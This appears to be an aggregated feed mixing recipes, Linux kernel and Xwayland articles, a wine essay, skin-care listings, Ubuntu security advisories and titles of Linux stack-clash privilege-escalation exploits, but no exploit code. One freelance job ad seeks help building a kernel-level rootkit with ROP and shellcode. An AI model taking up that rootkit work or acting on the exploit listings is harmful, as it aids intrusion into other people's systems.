Rosemary-Roasted Corn Muffins

Makes 1 dozen regular sized muffins or 6 very large muffins.

1 cup all purpose flour
1 cup coarse yellow cornmeal
½ cup sugar
1 ½ teaspoons baking powder
¼ teaspoon baking soda
¼ teaspoon salt
1 teaspoon minced fresh rosemary
1 cup roasted corn kernels (I use Trader Joe’s but can use plain corn kernels)
1 cup buttermilk
1 large egg, slightly beaten
¼ cup Canola oil (can substitute melted butter)
Vegetable-oil cooking spray.

Preheat oven to 375 degrees.
Spray muffin tins with cooking spray (I use Pam)
Whisk together dry ingredients including rosemary.
Stir in corn kernels.
Combine buttermilk, egg, and oil in a small bowl and then add to flour.
Stir just until combined.
Spoon batter into muffin cups.
Optional-sprinkle with minced rosemary.
Bake 15 to 18 minutes or until tops are golden and a toothpick inserted into center of muffins comes out clean. Let cool in tin or on a wire rack.Serve warm or at room temperature.
Muffins can be stored in an airtight container for several days or frozen for up to two months.

We serve these muffins warm with blueberry jam from the Jam Kitchen at the Green Briar Nature Center.

Enjoy!
          What Excites Me The Most About The Linux 4.12 Kernel   
If all goes according to plan, the Linux 4.12 kernel will be officially released before the weekend is through. Here's a recap of some of the most exciting changes for this imminent kernel update...
          Comment on Chameleon and High Sierra… by John   
Appreciate your PikerAlpha! When I tried that I get this error: panic cpu -Unable to find driver for this platform/ilokit/Kernel/IOPlatformExpert.ccp:1731
          Comment on XCPM for unsupported Processor… by KGP   
If I correctly understand, Stinga addresses the Kabylake update on 10.12.5. However, I would be interested in the actual Broadwell and Haswell KernelToPatch entries for macOS High Sierra Beta 10.13. Are you planning some update or modification of your "XCPM for unsupported Processor…" thread in the next time?
          Vegetarian Enchilada Pie   
This is my riff on a Utah standby Chicken Enchilada Pie, that my dear friend Nicole taught me how to make back in Ohio in 1995. The Chicken version layered tortillas with sour cream, cream of chicken soup, sauteed onions, cheese, and cooked chicken. My new version, adapted to vegetarian tastes and my progress at Weight Watchers (25 pounds down, yay!) is a different kind of yummy, and it has that quality I love about a good casserole: leftovers that last in the fridge, handy for lunching or snacks for me and other adults in the house for the days that follow.

I hear Nicole's in China now. She's lived around the world since our days in Ohio. She's such an excellent cook (and seamstress and business manager) I wonder what great things she's done since our daughters were small.

1.5 to 2 TB oil
1 medium summer squash
1 medium-small zucchini
1 red bell pepper
red or other onion, half a large
8-10 oz mushrooms
half a pound frozen corn kernels
2 1/2 cups shredded cheese
5-7 corn tortillas, which tend to be small.
28-ounce can of enchilada sauce, I like the green kind.

1. Pre-heat the oven to 350F, because that's how to cook any casserole.

2. dice up small the vegetables, medium-high heat the oil in the pan, then add the vegetables and saute. Here you can see the proportions.


Oh, I forgot to add the mushrooms and corn. I buy the pre-sliced mushrooms, and then chop them further from there. The corn really ought to be microwave cooked first, but I just threw it in the pan, slowing down and reducing the quality of the vegetables cooking. Oh well.


Now it's all mixed together. I really love the colors--this is why one of my Christmas side dishes for years was zucchini-bell.pepper-corn.


Now that's cooked; it's time to layer. Cover the bottom of the pan with 1/4 of the sauce, layer two tortillas, half of the vegetables, and another dose of sauce, and some (1/3 of) cheese.

Let's peek ahead with this layers diagram for the finished casserole. The fraction is how much of that item to put in that layer.

cheese (1/3)
sauce (1/4)
tortillas (1/3)
cheese (1/3)
sauce (1/4)
vegetables (1/2)
tortillas (1/3)
cheese (1/3)
sauce (1/4)
vegetables (1/2)
tortillas (1/3)
sauce (1/4)
\________pan________/

Here I'm in process covering those first tortillas with my first layer of veggies.


Sauce on the second layer, and repeat as before.


Cheese going on just before another layer of tortilla. If I'm going to use cheese, I use real cheese, not reduced-fat stuff. It doesn't take much (relative to what I used to do, perhaps) to give it that cheese-in-mix taste. I would have loved a Jack cheese here, but was happy to use the sharp cheddar that was in the house. I think it really adds to the nourishing deliciousness of the meal to use what I have.


And on that front, I wasn't stopped by the fact I only had five corn tortillas in the house. I tore the last one into pieces and spread it around for the top layer thus.


Last layer of sauce and cheese.

Cover and bake the standard 350F for 30 minutes. This pretty dish (from IKEA years ago) didn't have a lid, so I used foil.


And it's done! I suppose you could remove the foil at the end, if you want the cheese browned as well as bubbly, but for me this is good. Too often I burn the cheese at the end trying to do that. Feel free to send me an acetylene torch.


Was delish, and delish as leftovers for a couple days. Loved and appreciated by everyone over the age of 16--probably could have won the heart of the younger teen if it didn't fall into the inaccurately-named category "Mexican Food." Apparently my love of all things bean, cheese, and tortilla more than met her quota five years ago.

But never mine.


          Quinoa and Black Beans - All Recipes   
I recently bought several pounds of quinoa at a local store that sells damaged and close-to-date items. So, I've been looking around for yummy recipes to use it up. Here's one we tried last week and everyone loved it! I served it with tortilla chips to make it more kid-friendly and had salsa, sour cream and guac on the side.

http://allrecipes.com/Recipe/Quinoa-and-Black-Beans/Detail.aspx


  • 1 teaspoon vegetable oil
  • 1 onion, chopped
  • 3 cloves garlic, peeled and chopped
  • 3/4 cup uncooked quinoa
  • 1 1/2 cups vegetable broth
  • 1 teaspoon ground cumin
  • 1/4 teaspoon cayenne pepper
  • salt and pepper to taste
  • 1 cup frozen corn kernels
  • 2 (15 ounce) cans black beans, rinsed and drained
  • 1/2 cup chopped fresh cilantro

Directions

  1. Heat the oil in a medium saucepan over medium heat. Stir in the onion and garlic, and saute until lightly browned.
  2. Mix quinoa into the saucepan and cover with vegetable broth. Season with cumin, cayenne pepper, salt, and pepper. Bring the mixture to a boil. Cover, reduce heat, and simmer 20 minutes,
  3. Stir frozen corn into the saucepan, and continue to simmer about 5 minutes until heated through. Mix in the black beans and cilantro.

          Hire a Linux Developer with knowledge about kernel level rootkits functionality by aalesh28   
Embedded C based project on a 32 bit Linux processor. Someone with the knowledge of how the ROP (return oriented programming) is done and shellcodes. Not a major project, have done most of the work, just need help with a little bit of trouble shooting... (Budget: $30 - $250 USD, Jobs: C Programming, Embedded Software, Linux, Software Development, Ubuntu)
          Sr Engineer II, SW - Android Systems - Linux Kernel Internals - Device Driver   
HARMAN International - Bangalore, Karnataka - Position Summary: Work on Android code base for customizing for Car Infotainment Systems based on the requirements. Work on core Android frameworks for feature completion, .performance and stability improvements. Job Responsibilities: Porting, enhancing and customizing exist...
          BSP/Driver   
Spectrosign Software Solutions Pvt.Ltd - Hyderabad, Telangana - Secunderabad, Telangana - for this job. Redirect to company website BSP/Driver Spectrosign Software Solutions Pvt.Ltd 4 to 8 yrs As per Industry Standards Hyderabad/ Secunderabad... to compile, run and tweak Linux kernel for MIPS/PowerPC platforms Awareness of the Linux kernel and device driver programming. Exposure...
          Kernel’in 4.1.42 uzun süreli destek sürümü duyuruldu   
Linux çekirdeği resmi sitesi: https://www.kernel.org Uzun süreli destek sürümü: 4.1.42 2017-06-29 Değişiklik listesi…
          Kernel’in 4.11.8 kararlı sürümü duyuruldu   
Linux çekirdeği resmi sitesi: https://www.kernel.org En son kararlı çekirdek: 4.11.8 2017-06-29 Değişiklik listesi…
          Roman Gilg: Understanding Xwayland - Part 2 of 2   

Last week in part one of this two part series about the fundamentals of Xwayland, we treated Xwayland like a black box. We stated what its purpose is and gave a rough overview on how it connects to its environment, notably its clients and the Wayland compositor. In a sense this was only a teaser, since we didn’t yet look at Xwayland’s inner workings. So welcome to part two, where we do a deep dive into its code base!

You can find the Xwayland code base here. Maybe to your surprise this is just the code of X.org’s Xserver, which we will just refer to as the Xserver in the rest of this text. But as a reminder from part one: Xwayland is only a normal Xserver “with a special backend written to communicate with the Wayland compositor active on your system.” This backend is located in /hw/xwayland. To understand why we find this special backend here and what I mean with an Xserver backend at all, we have to first learn some Xserver fundamentals.

DIX and DDX

The hw subdirectory is the Device Dependent X (DDX) part of the Xserver. All other directories in the source tree form the Device Independent X (DIX) part. This structuring is an important abstraction in the Xserver. Like the names suggest the DIX part is supposed to be generic enough to be the same on every imaginable hardware platform. The word hardware hereby should be understood in an abstract way as being some sort of environment the Xserver works in and has to talk to, which could be the kernel with its DRM subsystem and hardware drivers or as we already know a Wayland compositor. On the other side all code, that is potentially different with respect to the environment the Xserver is compiled for is bundled into the DDX part. Since this code is by its very definition mostly responsible for establishing and maintaining the required communication channels with the environment, we can indeed call the platform specific code paths in DDX the Xserver’s backends.

I want to emphasize that the Xserver is compiled for different environments, because we are now able to understand how the Xorg and Xwayland binaries we talked about in part one and that both implement a full Xserver come into existence: Autotools, the build system of the Xserver, is told by configuration parameters before compilation what the intended target platforms are. It then will use for each enabled target platform the respective subdirectory in hw to compile a binary with this platform’s appropriate DDX plus the generic DIX from the other top level directories. For example to compile only the Xwayland binary, you can use this command from the root of the source tree:

./autogen.sh --prefix=/usr --disable-docs --disable-devel-docs \
  --enable-xwayland --disable-xorg --disable-xvfb --disable-xnest \
  --disable-xquartz --disable-xwin

Coming back to the functionality let’s look at two examples in order to better understand the DIX and DDX divide and how the two parts interact with each other. Take first the concept of regions: A region specifies a certain portion of the view displayed to the user. It is defined by values for its width, height and position in some coordinate system. How regions work is therefore completely independent on the choice of hardware the Xserver runs on. That allowed the Xserver creators to put all the region code in the DIX part of the server.

Talking about regions in a view we think directly of the screen this view is displayed on. That’s the second example. We can always assume that there is some sort of real or emulated screen or even multiple of them to display our view. But how these screens and their properties are retrieved is dependent on the environment. So there needs to be some “screen code” in DDX, but on the other hand we want to move as much logic as possible in the DIX to avoid rewriting shared functionality for different platforms.

The Xserver is equipped with tools to facilitate this dichotomy. In our example about screens DIX represents the generic part of such a screen in its _Screen struct. But the struct features also the void pointer field devPrivate, which can be set by the DDX part to some struct, that then provides the device dependent information for the screen. When DIX then calls DDX to do something concerning the screen, DIX also hands over a _Screen pointer and DDX can retrieve these information through the devPrivate pointer. The private resource pointer is a tool featured in several core objects of the Xserver. For example we can also find it in the _Window struct for windows.

Besides this information sharing between DIX and DDX there are of course also procedures triggered in one part and reaching into the other one. And these procedures run according to the main event loop. We will learn more about them when we now finally analyze the Xwayland DDX code itself.

The Xwayland DDX

The names of the source files in the /hw/xwayland directory already indicate what they are supposed to do. Luckily there are not many of them and most of the files are rather compact. It’s quite a feat that the creators of Xwayland were able to provide X backward compatibility in a Wayland session with only that few lines of code added to the generic part of a normal Xserver. This is of course only possible thanks to the abstractions described above.

But coming back to the files here’s a table of all the files with short descriptions:

Files Description
xwayland.h
xwayland.c
Basically the entry point to everything else, define and implement the most central structs and functions of the Xwayland DDX.
xwayland-output.c Provides a representation of a display/output. All its data is of course received from the Wayland server.
xwayland-cvt.c Supports the output creation by generating a display mode calculated from available information.
xwayland-input.c Deals with inputs provided by mice and other input devices. As you can see by its size, it’s not the most straight forward area to work on.
xwayland-cursor.c Makes a cursor appear. That is in a graphic pipeline often treated as a special case to reduce repaints.
xwayland-glamor.c
xwayland-shm.c
Provide two different ways for allocating graphic buffers.
xwayland-glamor-xv.c
xwayland-vidmode.c
Support for hardware accelerated video playback and older games, what is in parts not yet fully functional.

In the following we will restrict our analysis to the xwayland.* files, in order to keep the growing length of this article in check.

Some basic structs and functions also shared with the other source files are defined in the header file xwayland.h. A good first point to remember is, that all structs and functions with names starting on xwl_ are only known to the Xwayland DDX and won’t be called from anywhere else. But at the beginning of the xwayland.c file we find some methods without the prefix. They are only defined in the DIX and their implementation is required to make Xwayland a fully functional DDX.

Scrolling down to the end of the file we see the main entry point to the DDX on server startup, the InitOutput method. If you look closely you will notice a call to AddScreen, where we also hook up an Xwayland internal screen init function as one of its arguments. But it’s only called once! So what about multiple screens? The explanation is, that Xwayland uses the RandR extension for its screen management and here only asks for the creation of one screen struct as a dummy, which holds on runtime some global information about the Wayland environment. We looked at this particular screen struct in the previous chapter as an example for information sharing between DIX and DDX through void pointers and that these pointers are set by the DDX.

Although it’s only a dummy, we can still follow this now live in action in the hooked up init function xwl_screen_init. Here we set with the help of some DIX methods a hash key to later identify the data field again and then set the data, which is an xwl_screen struct with static information about the Wayland environment the Xwayland server is deployed in.

In the hooked up init function the later manipulation of the function pointers RealizeWindow, UnrealizeWindow and so on is also quite interesting. I asked Daniel about it, because I didn’t understand at all the steps done here as well as similar ones later in the involved functions xwl_realize_window, xwl_unrealize_window and so on. Daniel explained the mechanism well to me and it is quite nifty indeed. Basically thanks to this trick, called wrapping, Xwayland and other DDX can intercept DIX calls to a procedure like RealizeWindow, execute their own code, and then go on with the procedure looking to the DIX like it never happened.

In the case of RealizeWindow, which is called when a window was created and is now ready to be displayed, we intercept it with xwl_realize_window, where an Xwayland internal representation of type struct xwl_window is allocated with all the Xwayland specific additional information, in particular a Wayland surface. At the end the request to create the surface is sent to the Wayland server via the Wayland protocol. You can probably imagine what UnrealizeWindow and the wrapped xwl_unrealize_window is supposed to do and that it does this in a very similar way.

As a last point let’s look at the event loop and the buffer dispatch of possibly new or changed graphical content. We have block_handler, which was registered in xwl_screen_init to the DIX, and gets called continuously throughout the event loop. From here we call into a global damage posting function and from there for each window into xwl_window_post_damage. If we’re lucky we get a buffer with hardware acceleration from the implementation in xwayland-glamor.c or otherwise without acceleration from the one in xwayland-shm.c, attach it to the surface and fire it away. In the next event loop we play the same game.

Forcing an end to this article, what we ignored in total is input handling in Xwayland and we also only touched the graphics buffer in the end. But at least the graphic buffers we’ll discuss in the coming weeks exhaustively, since my Google Summer of Code project is all about these little guys.


          Comment on Reliably compromising Ubuntu desktops by attacking the crash reporter by Ted Mielczarek   
I have to admit, I don't even really understand the utility of having the MIME type association for Apport. In normal functioning it gets launched by way of /proc/sys/kernel/core_pattern when an application crashes. Is there real value in being able to load an arbitrary .crash file from the desktop environment? I wonder if this is one of those things that's cargo-culted, or maybe encouraged by some misguided guidelines, like "any application that writes a file should support opening it from the file manager"? In any event, nice work on finding and reporting the vulnerabilities!
          Comment on Reliably compromising Ubuntu desktops by attacking the crash reporter by cron.weekly issue #59: Kernel 4.0, Java, containerd, sfb, Redis, CentOS 7.3, Nginx, Ansible & more!   
[…] Reliably compromising Ubuntu desktops by attacking the crash reporter […]
          Re: Confirmed: OnePlus 5’s Display is Upside-Down – Likely Causes Jelly Scrolling   

They have not deliberately chosen to mount display upside down: there is simply no reason for this. Someone made a mistake: perhaps his head was growing from another place? And it was cheaper for them to make changes in kernel. They just had no idea there would be jelly effect. Happens to OEMs. Remember Samsung exploding batteries? The only conclusion is this: stay away from such OEMs - for good...


          Форум по HANA | Re: обработка alerts и мониторинг SAP HANA   
Любые на основе системных вьюх, например, M_LOAD_HISTORY_[HOST|SERVICE]

Код:select top 10 * from M_LOAD_HISTORY_SERVICE where CPU > X and WAITING_THREAD_COUNT > Y


или
Код:select * from M_SAVEPOINTS where CRITICAL_PHASE_DURATION > 1000000


и тп, зависит от фантазии

Статистика : Добавлено kernelpanic • Пт, июн 30 2017, 19:42 • Ответы 8 • Просмотры 154

          Hire a Linux Developer with knowledge about kernel level rootkits functionality by aalesh28   
Embedded C based project on a 32 bit Linux processor. Someone with the knowledge of how the ROP (return oriented programming) is done and shellcodes. Not a major project, have done most of the work, just need help with a little bit of trouble shooting... (Budget: $30 - $250 USD, Jobs: C Programming, Embedded Software, Linux, Software Development, Ubuntu)
          What I did with left over roast chicken   
I have to say that the original roasted chicken was absolutely delicious.  Moist as could be.  And the gravy I made was also excellent, if I say so myself.  I have found that even on cruises, most things I ask for, I prefer the way I fix better.  I realize I'm not making a dish for 2,000 people so I can take my time and care more about it.  No assembly-line food in my house, unless I want it (go out to eat or go on a cruise, or something like that).

Tonight I made something with the left-over chix from yesterday, and it was really, really good.  A surprise.

First I made the rice (1 cup water, 1/2 cup rice).  I boiled the water, put the rice in, and then simmer it until the water was all used up and the rice was cooked.  I did add salt to the water.
While the rice was cooking, I mixed one can of low-sodium/fat cream of chicken soup to 3/4 of a can of Half and half.  I stirred that all together to get it ready for the rice.

And while the rice was still cooking, I took 6 slices of American cheese -- which I had in the fridge for Alan's sandwiches -- and cubed it, or cut it into small pieces and set that aside.  I put 1/2 cup of parmesan cheese (grated) into the soup mixture. 

And while the rice was cooking, I took the left over chicken which I had ripped off the carcus last night and made the pieces a bit smaller.

When the rice was finished cooking, I put it into the soup and stirred it real good, then I added the cheese and the chicken, stirring them into the soup/rice.  On top of the whole thing I sprinkled  Stove Top Stuffing Mix -- just enough to cover it.

I put it in a pre-heated 350 degree oven for 1/2 hour -- it was really bubbling away when I opened the oven, and the stuffing mix was really crispy.

I dished it up onto a plate, sprinkled some black pepper over it, and dug in.  I have to say, it was really yummy and the rice was cooked.

I think I finally learned how to make a rice casserole and the rice gets cooks through.  No hard kernels this time!

ttfn
          Who are the Future “Thought Leaders” for Italian Wine?   
With harvest behind us and winemaking for the year finished, Italians in the wine trade are living out of their suitcases. Traveling to markets around the world, attending portfolio tastings and working with salespeople in the trenches. Last week there was Prowein. This week all eyes turn to Bordeaux for their annual UGC 2016 vintage tastings. But soon there will be Vinitaly. Emails are being sent to round up prospective new clients and export markets. Seminars are being scheduled. Dinners, which will go late into the night, are being planned, in and around Verona. And there are all the people planning travel to Italy to visit and taste, before and after Vinitaly. All this eating and drinking and tasting and talking, what will come of it?


Armando de Rham with Luciano de Giacomi at Bricco del Drago
The process of making wine, while it seems, on the surface, to be an activity confined to a facility to process grapes into the precious liquid, that is only part of it. Of course, as has been told time and again, there is the vineyard and all the practices that farmers and gardeners are concerned with. There is the spiritual connection, terroir as the Omniscient Presence, the invisible Guiding Hand that makes every tiny parcel unique and particular.

And there is the ongoing conversation among wine lovers and influencers, over the direction wine is taking, as it is guided by the hand of men and women who are the servants of the vine.

I kiddingly use the term “slaves to the wine god,” but there is a kernel inside that phrase. If one understands that connection, it makes all the difference in the world. It is the difference between taking off early on a Friday and going to lunch, popping some bottles and posting one’s trophies on Instagram or Facebook. And taking some bottle (or bottles) to see a client in the hopes of finding more homes for those wines which those men and women back in the vineyards slaved so hard over to make.

Salvo Foti in his Aeris vineyrd in Milo, on Etna
Somewhere in this process, there are people who are actually concerned with the future of wine, not just one’s immediate visceral pleasures. People who understand history, or have even made some of it, who know Italian wine wasn’t always at the top of the charts when it came to quality and appreciation.

It’s hard for someone who hasn’t been in the game for very long to understand this: Italian wines, at one point, were lacking, some would say even awful. White wines, especially. This observer noticed, around the early 1980’s, that a transformation was taking place inside wineries. Italy was coming out of its slumber. The economy was creating more opportunities, and especially in a global sense, the markets were opening up to wine from Italy that had once been dominated by France. It was, it is an extremely exciting time. Again, though, there was some direction, some thought, some philosophy that had to be put into action, in order for that transformation to proceed.

So, now we are at the mountain top. Where do we go now? Who are the 21st century Antinori’s, Gaja’s, Quintarelli’s, Mastroberardino’s? Who is leading Italian wine in to the future, not only with their wine but with their ideas?

Alessandro de Renzis Sonnino in his venerable vinsantaio
That is the stuff, at late night dinners and bottles of Vin Santo, which people will talk over in the coming days. Along with the political climate change that is affecting every one of us on earth, and the economic gyrations, the mass movement of humans across the globe. That and the fundamental questions many of us ask, often – what am I doing here? Am I making a difference? It might take more than a bottle of Vin Santo.

Consider this: the experience a young winemaker has, over a winter break, whether trekking across Myanmar or swimming in Miami, can affect one’s perception of their place in the world. And we are in a unique time now, as subliminal factors enter into the experience of young Italians in the wine trade, who go back to Barolo or Montalcino with these experiences and alters their philosophy about wine. These modern day Marco Polos, en masse, are like tiny drops of water - drip, drip, drip - slowly impressing a concavity into the stone. Do you not find this to be an exciting time for Italian wine? For sure, there are those souls who care not to venture any further from their farm in Pontignano than maybe Florence, or in Barbaresco to perhaps Torino. And we need those people too. They are the grounding rod for the process. They prevent Chianti from turning into Shiraz or Barbaresco into Merlot.

Arianna Occhipinti - in Fossa di Lupo
I know I’ve lost some of you with this. In fact, in the last few months I’ve probably lost many more to the many distractions and chatter in our everyday lives of the here and now. The pressing issues of the day, the scandals, the dramas, the nerve wracking, heart pounding, stress inducing dilemmas at our doorstep. But take a step back, for a minute, let those daily things be, and just think about where we’re at in regards to Italian wine and what it means to you, reading this. Hasn’t it blossomed beautifully in your lifetime? Haven’t those gardeners of the soul of Italian wine done an amazing job?

We’ve come a long way in the last 7,000 or 8,000 years. And the last 70 have been probably the most impactful of them all. But those pioneers are older now. And while their light hasn’t dimmed, their time on the stage is passing. Their sons and daughters, and grandchildren, are swarming the center line. Which of them are gazing into the deep pool of time with the thirst for leading us where no one has gone before?






wine blog +  Italian wine blog + Italy W

          Linux Kernel 4.8.9 Denial Of Service Vulnerability   
The TCP stack in the Linux kernel before 4.8.10 mishandles skb truncation, which allows local users to cause a denial of service (system crash) via a crafted application that makes sendto system calls, related to net/ipv4/tcp_ipv4.c and net/ipv6/tcp_ipv6.c.
          Linux Kernel 3.10 device compromise Execute Code Vulnerability   
Linux Kernel is prone to a local code-execution vulnerability.This allows a local attacker to exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts may result in a denial-of-service condition.
          4 Slackware Updates   
The following updates has been released for Slackware: bind (SSA:2017-180-02) httpd (SSA:2017-180-03) libgcrypt (SSA:2017-180-04) Slackware 14.1 kernel (SSA:2017-180-01)...
          Aveeno Bath & Shower Oil 250ml   

It is used in homeopathy to prepare moisturising skin...preparations. The oil also contains liquid paraffin (sometimes known as mineral oil) and sunflower seed oil, and works by providing a layer of oil on the surface of the skin to prevent water evaporating from the skin surface. With Natural Colloidal Oatmeal Bath & Bodycare and Shower Oil Suitable For People who may be prone to Eczema Aveeno Oil for Bath & Bodycare and Shower with Colloidal Oatmeal and Softening Oils, thoroughly cleanses, moisturises and conditions dry and sensitive skin.

May be used in Bath & Bodycare and shower. Use - Bath & Bodycare: add approximately 30ml (2 tablespoons) to Bath & Bodycare water. Shower; massage directly onto wet skin and then rinse.

Ingredients: Paraffin Liquidum, Helianthus Annus, (Sunflower) Seed Oil, Diethylhexyl Adipate, Sorbeth-40 Hexaoleate, Avena Sativa (Oat) Kernel Flour, Silica, Cera Alba, Tocopheryl Acetate, Ascorbyl Palmitate, Triclosan, Parfum.

Price: £7.70 Special Price: £7.09


          Aveeno Cream 100ml   

Regular use of Avenno Cream helps prevent dryness and irritation caused by skin dehydration.|Aveeno is suitable for dry snsitive skin and also for people who may be prone to eczema.

Contains- Oatmeal,allantoin,glycerin. Ingredients-Aqua,Glycerin,Distearyldimonium Chloride,Isopropyl Palmitate,Paraffinum Liquidum,Cetyl Alcohol,Dimethicone,Avena Sativa(Oat)Kernel Flour,Allantoin,Paraffin,Cera Microcristallina, Stearyl Alcohol,Myristyl Alcohol,Isopropyl Alcohol,Sodium Chloride,Benzyl Alcohol.

Price: £6.80 Special Price: £6.45


          Aveeno Hand Cream 75ml   

Aveeno Hand cream absorbs quickly and leaves dry hands looking and feeling soft, smooth and healthy.

Ingredients: Aqua,Glycerin,Distearyldimonium Chloride,Isopropyl Palmitate,Paraffinum Liquidum,Cetyl Alcohol,Dimethicone,Avena Sativa(Oat)Kernel Flour,Allantoin,Paraffin,Cera Microcristallina, Stearyl Alcohol,Myristyl Alcohol,Isopropyl Alcohol,Sodium Chloride,Benzyl Alcohol.

Price: £6.50 Special Price: £5.85


          Aveeno Moisturising Cream 300ml   

Aveeno Moisturising Cream combines the concentrated goodness of finely-milled naturally active Colloidal Oatmeal with rich emollients.
This unique formula is clinically proven to go beyond 24 hour moisturisation and
replenish the skin's natural barrier function, to significantly improve the condition of dry skin in just two weeks.
Absorbs quickly and leaves skin looking and feeling soft and smooth and healthy.

Ingredients-Aqua,Glycerin,Distearyldimonium Chloride,Isopropyl Palmitate,Paraffinum Liquidum,Cetyl Alcohol,Dimethicone,Avena Sativa Kernel Flour, Allantoin,Paraffin,Cera Microcristallina,  Alcohol, Stearyl Myristyl Alcohol,Isopropyl Alcohol,Sodium Chloride,Benzyl Alcohol.

Price: £12.50 Special Price: £11.05


          Aveeno Skin Relief Moisturising Lotion with Shea Butter 200ml   

Aveeno with Shea Butter is clinically proven to moisturise for 24 hours and soothe on contact, providing immediate, long lasting relief for extra dry, irritable skin.

Skin is left looking and feeling soft, smooth and healthy.

Fragrance free and fast absorbing. Dermatologist Tested With Triple Oat Complex Immediately Relieves and Nourishes Extra Dry, Irritable Skin Moisturises For 24 Hours

Shea Butter Ingredients-Aqua,Glycerin,Distearyldimonium Chloride,Isopropyl Palmitate,Paraffinum Liquidum,Cetyl Alcohol,Dimethicone,Avena Sativa(Oat)Kernel Flour,Allantoin,Paraffin,Cera Microcristallina, Stearyl Alcohol,Myristyl Alcohol,Isopropyl Alcohol,Sodium Chloride,Benzyl Alcohol.

Price: £6.25 Special Price: £6.10


          Nelsons Rhus Tox Cream For Rheumatic Conditions 30g   

Ingredients: Rhus Toxicodendron 6x 9% v/w. Purified Water, Glyceryl monostearate + Macrogol stearate, Apricot kernel oil, Theobroma oil, glycerol Polawax GP200 (cetearyl alcohol, PEG 20 Stearate), Cetostearyl alcohol, cetyl palmitate, Glyceryl monocaprylate, Methyl parahydroxybenzoate, Propyl parahydroxybenzoate.
Directions: Check that the tuber seal is not broken, before first use. Pierce tube seal with point in top of cap before first use.
Massage gently into the affected area as required.
Precautions: Keep all medicines out of reach of children. Side effects are rare. If you notice anything unusual or symptoms persist, consult your doctor.
If pregnant or breastfeeding consult your doctor before use. Do not use if sensitive to any of the ingredients.

Price: £4.65 Special Price: £4.35


          Phytolisse Express Smoothing Mask For Unruly, Frizzy and Rebellious Hair 200ml    

Phyto Phytolisse Express Soothing Mask is packed with ultra-performing smoothing agents, instantly detangles, straightens and nourishes hair. A derivative of pine pulp shields each hair strand from humidity and smoothes the cuticle down for long lasting anti-frizz result. A synergy of red and brown algae tames unruly and rebellious hair resulting in sleek frizz-free hair. Enriched with nurturing apricot kernel oil, its delicately scented formula leaves hair shiny, supple and silky soft.

Price: £24.50 Special Price: £19.00


          USN-3342-2: Linux kernel (HWE) vulnerabilities    

Ubuntu Security Notice USN-3342-2

29th June, 2017

linux-hwe vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 16.04 LTS

Summary

Several security issues were fixed in the Linux kernel.

Software description

  • linux-hwe - Linux hardware enablement (HWE) kernel

Details

USN-3342-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.10.
This update provides the corresponding updates for the Linux Hardware
Enablement (HWE) kernel from Ubuntu 16.10 for Ubuntu 16.04 LTS.

USN-3333-1 fixed a vulnerability in the Linux kernel. However, that
fix introduced regressions for some Java applications. This update
addresses the issue. We apologize for the inconvenience.

It was discovered that a use-after-free flaw existed in the filesystem
encryption subsystem in the Linux kernel. A local attacker could use this
to cause a denial of service (system crash). (CVE-2017-7374)

Roee Hay discovered that the parallel port printer driver in the Linux
kernel did not properly bounds check passed arguments. A local attacker
with write access to the kernel command line arguments could use this to
execute arbitrary code. (CVE-2017-1000363)

Ingo Molnar discovered that the VideoCore DRM driver in the Linux kernel
did not return an error after detecting certain overflows. A local attacker
could exploit this issue to cause a denial of service (OOPS).
(CVE-2017-5577)

Li Qiang discovered that an integer overflow vulnerability existed in the
Direct Rendering Manager (DRM) driver for VMWare devices in the Linux
kernel. A local attacker could use this to cause a denial of service
(system crash) or possibly execute arbitrary code. (CVE-2017-7294)

It was discovered that a double-free vulnerability existed in the IPv4
stack of the Linux kernel. An attacker could use this to cause a denial of
service (system crash). (CVE-2017-8890)

Andrey Konovalov discovered an IPv6 out-of-bounds read error in the Linux
kernel's IPv6 stack. A local attacker could cause a denial of service or
potentially other unspecified problems. (CVE-2017-9074)

Andrey Konovalov discovered a flaw in the handling of inheritance in the
Linux kernel's IPv6 stack. A local user could exploit this issue to cause a
denial of service or possibly other unspecified problems. (CVE-2017-9075)

It was discovered that dccp v6 in the Linux kernel mishandled inheritance.
A local attacker could exploit this issue to cause a denial of service or
potentially other unspecified problems. (CVE-2017-9076)

It was discovered that the transmission control protocol (tcp) v6 in the
Linux kernel mishandled inheritance. A local attacker could exploit this
issue to cause a denial of service or potentially other unspecified
problems. (CVE-2017-9077)

It was discovered that the IPv6 stack in the Linux kernel was performing
its over write consistency check after the data was actually overwritten. A
local attacker could exploit this flaw to cause a denial of service (system
crash). (CVE-2017-9242)

Update instructions

The problem can be corrected by updating your system to the following package version:

Ubuntu 16.04 LTS:
linux-image-4.8.0-58-lowlatency 4.8.0-58.63~16.04.1
linux-image-4.8.0-58-generic-lpae 4.8.0-58.63~16.04.1
linux-image-generic-hwe-16.04 4.8.0.58.29
linux-image-lowlatency-hwe-16.04 4.8.0.58.29
linux-image-4.8.0-58-generic 4.8.0-58.63~16.04.1
linux-image-generic-lpae-hwe-16.04 4.8.0.58.29

To update your system, please follow these instructions: https://wiki.ubuntu.com/Security/Upgrades.

After a standard system update you need to reboot your computer to make
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, which requires you to recompile and
reinstall all third party kernel modules you might have installed.
Unless you manually uninstalled the standard kernel metapackages
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,
linux-powerpc), a standard system upgrade will automatically perform
this as well.

References

CVE-2017-1000363, CVE-2017-5577, CVE-2017-7294, CVE-2017-7374, CVE-2017-8890, CVE-2017-9074, CVE-2017-9075, CVE-2017-9076, CVE-2017-9077, CVE-2017-9242, LP: 1699772, https://www.ubuntu.com/usn/usn-3333-1


          Linux Kernel ldso_dynamic Stack Clash Privilege Escalation   
Linux kernel ldso_dynamic stack clash privilege escalation exploit. This affects Debian 9/10, Ubuntu 14.04.5/16.04.2/17.04, and Fedora 23/24/25.
          Linux Kernel ldso_hwcap_64 Stack Clash Privilege Escalation   
Linux kernel ldso_hwcap_64 stack clash privilege escalation exploit. This affects Debian 7.7/8.5/9.0, Ubuntu 14.04.2/16.04.2/17.04, Fedora 22/25, and CentOS 7.3.1611.
          Linux Kernel offset2lib Stack Clash   
Linux kernel offset2lib stack clash exploit.
          Ubuntu Security Notice USN-3342-2   
